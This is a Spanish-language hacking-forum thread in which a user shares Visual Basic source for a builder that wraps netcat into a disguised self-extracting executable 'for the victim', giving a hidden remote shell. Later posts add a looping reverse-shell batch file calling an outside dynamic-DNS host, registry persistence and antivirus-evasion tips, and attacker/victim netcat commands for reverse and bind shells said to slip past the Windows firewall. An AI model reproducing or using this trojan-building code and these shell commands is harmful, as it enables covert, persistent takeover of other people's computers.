 Autor
|
Tema: Jugando con netcat (Leído 58840 veces)
|
WHK
 Desconectado
Mensajes: 842
+-=[Yan]=-+
|
Servidor NC 1.2Bueno.. hice un programa bastante improvisado pero bastante efectivo para solucionar el problema de muchos... La ides de este programa es crear servidores de netcat.... solo le pasas a la victima el ejecutable y ya tienes la shell sin compilar nada. Lo bueno es que cuando abres la carnada no se ve ni un pantallazo del DOS como se hacia antes.  Tanto el programa como el codigo fuente está disponible como siempre en http://512.iespana.es/ncCodigo:Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Sub Command1_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&© rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% " + Text4.Text + " " + Text5.Text + " ^^^|cmd.exe^^^| " + Text4.Text + " " + Text6.Text + " -d ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub
Private Sub Command2_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&© rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -d -e cmd.exe " + Text2.Text + " " + Text3.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub
Private Sub Command3_Click()
Dim hShell As Long
Dim sCmd As String
sCmd = "copy join.dll " + Text7.Text + ".exe&© rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -L -d -e cmd.exe -p " + Text1.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub
Private Sub Command4_Click()
End
End Sub
Private Sub Command5_Click()
Form2.Show
End Sub
Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Unload Me
Form2.Hide
End
End Sub
'Creado por WHK para el foro de elhacker.net
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK   |
|
|
ne0x
Desconectado
Mensajes: 270
|
Este ultimo es el que mas me gusta !!
Muy bueno, hay que probarlo a ver si funciona como se dice.
|
|
|
|
|
En línea
|
|
|
|
Martín Fierro
Desconectado
Mensajes: 381
Por crom!!!. Chiapas dedo izquierdo de wadalbertía
|
Felicidades compadre, nunca se me hubiera ocurrido, hacerlo así.....
La pregunta estriba respecto a que los join.dll y el rar.dll así como el nc.exe vienen comprimidos en el ejecutable o lo traes en una carpeta, no he bajado el archivo y te pregunto a rajatabla.
Veo si lo traduzco al autoit para que no necesites dlls y las dlls tools se compriman en el mismo ejecutable.
De verdad que me admira tu ingenio... Lo hubiera hecho yo si se me hubiera ocurrido, también he manejado el rar en línea de comandos, aunque el join.dll sí que no lo conozco...
|
|
|
|
|
En línea
|
Y no me importa nada..
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando] Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda. En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias. -------------------------------------------------------- También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo: Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Dim LTD As String, F As Variant
Open App.Path & "\ejecutar.txt" For Input As FreeFile
Input #1, LTD
Text1.Text = LTD
Close #1
Dim hShell As Long
Dim sCmd As String
sCmd = "cmd /c " & Text1.Text
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End
End Sub
'Creado por WHK para el foro de elhacker.net
Como se ve no se mucho de programación pero si tengo harto ingenio :p Como siempre en http://512.iespana.es/ncEste espacio en mi web es exclusivo para el foro y no para todo el resto del publico para que despues no digan que me cuelgo del foro para levantar mi web  ademas no lo necesito |
|
|
|
« Última modificación: 02 Mayo 2007, 01:05 por WHK »
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
Martín Fierro
Desconectado
Mensajes: 381
Por crom!!!. Chiapas dedo izquierdo de wadalbertía
|
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando]
Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda.
En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias.
--------------------------------------------------------
También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo:
Ya lo estoy viendo, conozco la técnica, yo lo hice igual con varios programas, incluso puedes empaquetarlo con el Fusion en el mismo ejecutable, el nc.dll y el cryptcat.dll los tengo así en varios programas que hice para GUI de ellos, también hice un manager GUI para wget y use la misma técnica. Sipo le entendí a tu código a la primera, pero si te confieso que el del join si no lo identifique. Enhorabuena, te digo ya vere con tiempo si lo paso a autoit y claro te doy el crédito. Hace tiempo que renuncié al VB para adoptar el autoit que es menos pesado y necesita menos ocx y demás, además es más Basic. |
|
|
|
|
En línea
|
Y no me importa nada..
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
join.dll es un ejecutable winrar SFX donde dentro está el ejecute_invisible.exe ... lo que hace el programa es renombrar nc.dll a %random%.exe y a rar.dll a rar.exe y con todo eso comprimir el %random%.exe + ejecutar.txt dentro del rar ejecutable con el nombre propuesto en text1.text
si kieres verlo puedes abrirlo extrayendo ficheros con winrar... es mas.. al servidor puedes cambiarle el icono con el mismo winrar y es completamente configurable para el que tenga conocimientos un poco mas avanzados, pero por ahora asi como está es ideal para los que re100 estan aprendiendo. y ojo que las librerias no deben ir en ningun otro lado que no sea en el mismo directorio (carpeta) donde está el programa ya que no son dll reales... como dije.. no se mucho de programación asi que use la imaginación para juntar el rar en modo consola y un winrar sfx para que el servidor-nc haga las configuraciones necesarias sobre ellos.
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
Grave
Desconectado
Mensajes: 221
Sois como sepulcros emblanquesidos que no se ven
|
Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación
Me referia a eso  |
|
|
|
|
En línea
|
"y el conocimiento os hara libres"    Module Console1 Console.Write("Hello Word") Console.ReadLine() End Module |
|
|
diorena
Desconectado
Mensajes: 1
|
hola sabes tengo un problema ya que baje el netcat y el reshack pero no me funciona nada a pesar de seguir tus instrucciones al pie de la letra, ademas te cuento que baje e reshack y esta en español lo cual es diferente a lo que tu tienes en el tema, me podrias dar una pauta de donde bajar el reshack en ingles ya que no lo encuentro o bien iluminarme en algo que puedo estar haciendo mal de antemano gracias.
muy buen tema y muy interesante gracias
|
|
|
|
|
En línea
|
|
|
|
nica
Desconectado
Mensajes: 46
|
baja el programa que puso whk, en realidad si funciona, lo unica pregunta que tengo es que kuando uso un scaneador de puertos, mas especificamente el nmap este no me arroja que tengo abierto ese puerto... por que???
* donde se puede modificar o se puede agregar al codigo que no se cree el ejecutable 31823.exe, por que se mira todo sospechoso en el administrador de tareas
* lo otro es que se crea en la carpeta de los temporales del usuario en donde se ejecuta, pero se crea en alguna otra carpeta???
** me puse a pensar que al final de las cosas y para mientras uno se logee usando el server de whk se puede subir el netcat siempre troyanizado a otra carpeta y agregar la ruta al registro de windows.
|
|
|
|
« Última modificación: 10 Mayo 2007, 00:08 por nica »
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
Modificaré el server-nc para ponerle un nombre propio al proceso ya que lo hice como %random% para que pudieses tener mas de una shell directa o remota sin causar conflictos con otras configuraciones anteriores.
Cuando se crea el servidor este deja una shell remota el cual puedes cerrarloel proceso del netcat. El archivo se ejecuta en %TMP% porque es el único lugar donde tienes 100% sobreescritura sin importar el usuario en que estes (Restringida).
Me pondré a trabajar con lo del bot IRC Aunque no creo que algunos se pongan muy contentos porque mis bots son algo macabro jajajajaja es broma... lo haré.
|
|
|
|
« Última modificación: 10 Mayo 2007, 05:54 por WHK »
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
nica
Desconectado
Mensajes: 46
|
para los que tenian problemas con ".... no es una aplicacion win32 valida..." pues les cuento que a mi se me resolvio el problema primero haciendo el proceso en winrar, incluso hasta se pueden saltar el paso del reshacker por que el mismo winrar te agrega el incono al ejecutable, pero si lo kieren pasar por el reshack pues no hay problem por que tambien lo hice asi y no hubo problema, solo recuerden que primero la parte del rar y despues la parte del reshack.
por cierto tengo una duda, como puedo hacer para que no se me cierre la conexion y que esta siempre este activa????
|
|
|
|
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
antorchahumana25 : Puedes bajarlo de http://512.iespana.es/ncNica: Puedes hacer que el netcat escuche a un bat en ves del cmd.exe donde el bat diga: @echo off
:1
nc -d -e cmd.exe ip puerto
goto 1De esta forma cuando se te desconecte el netcat solito volverá a conectarse denuevo y también puedes añadir una entrada de registro con el comando reg add para que inicie automaticamente en cada reinicio de esa pc (recuerda que para eso Debes tener una ip fija donde te llegue la shell o puedes tener una cuenta No-Ip y poner tu DNS (nombre de dominio) en ves de la ip) EJ: @echo off
:1
nc -d -e cmd.exe bogamory.sytes.net 80
goto 1Ahora estoy terminando otras cosas pero cuando termine buelvo para terminar lo del bot IRC con netcat y esto mismo de reconecciones automaticas pero con imagenes. |
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
Hoy en dia el netcat es detectado como archivo potencialmente malicioso pero puedes agregarlo a la lista de archivos omitidos para que no te lo borre. Para mayor comodidad te recomiendo ponerlo en tu system32 y poder manejar las conexiones ejecutando directamente nc desde tu linea de comandos (CMD).
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
claro.. repetiré las cosas mil y una ves hasta que todos hayan aprendido por muy poco que sepan.
alt 126 ~
alt 124 |
alt 60 <
alt 62 >
netcat pipeado haciendo reverse shell
------------------------------------------------------
atacante:
nc -vv -L -p 80
nc -vv -L -p 25
------------------------------------------------------
victima:
nc xxx.xxx.xxx.xxx 80 | cmd.exe | nc xxx.xxx.xxx.xxx 25 -d
------------------------------------------------------
se enviaran comandos por puerto 80
y se resiviran por puerto 25
de esa manera se pasa al fw de windows SP2
------------------------------------------------------
netcat en reverse shell
------------------------------------------------------
atacante:
nc -vv -L -p 25
------------------------------------------------------
victima:
nc -d -e cmd.exe xxx.xxx.xxx.xxx 25
------------------------------------------------------
Se enviara una reverse shell por el puerto 25
------------------------------------------------------
netcat shell directa
------------------------------------------------------
victima:
nc -L -d -e cmd.exe -p 25
------------------------------------------------------
atacante:
nc xxx.xxx.xxx.xxx 25 -vv
------------------------------------------------------
La victima deja netcat a la escucha por el puerto 25
para que posteriormente el atacante se conecte
------------------------------------------------------
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
|
 |
